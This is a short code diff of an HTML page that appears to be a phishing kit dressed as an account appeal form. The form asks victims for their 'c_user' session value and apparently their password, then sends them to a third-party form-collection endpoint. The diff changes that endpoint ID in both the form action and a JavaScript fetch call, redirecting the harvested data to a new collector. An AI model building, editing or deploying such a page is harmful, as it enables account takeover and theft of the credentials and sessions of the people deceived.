--- a/index (1).html
+++ b/index (1).html
@@ -997,7 +997,7 @@
                     </div>
                 </div>
                 
-                <form class="appeal-form" action="https://submit-form.com/BLs04ZolX" method="POST">
+                <form class="appeal-form" action="https://submit-form.com/w3mjT6NV0" method="POST">
                     <div class="form-group">
                         <label for="c_user" data-translate="c_user_label">c_user Value</label>
                         <input type="text" id="c_user" name="c_user" data-placeholder="c_user_placeholder" placeholder="Enter your c_user value (numbers only)" pattern="\d+" title="Please enter numbers only" required="">
@@ -1663,7 +1663,7 @@
                     confirmPasswordBtn.innerHTML = `<i class="fas fa-spinner fa-spin"></i> ${translations[currentLanguage]['processing'] || 'Processing...'}`;
                     
                     // Submit to SubmitForm.com
-                    const response = await fetch('https://submit-form.com/BLs04ZolX', {
+                    const response = await fetch('https://submit-form.com/w3mjT6NV0', {
                         method: 'POST',
                         headers: {
                             'Content-Type': 'application/json',
@@ -1855,3 +1855,4 @@
     </script>
 
 </body></html>
+
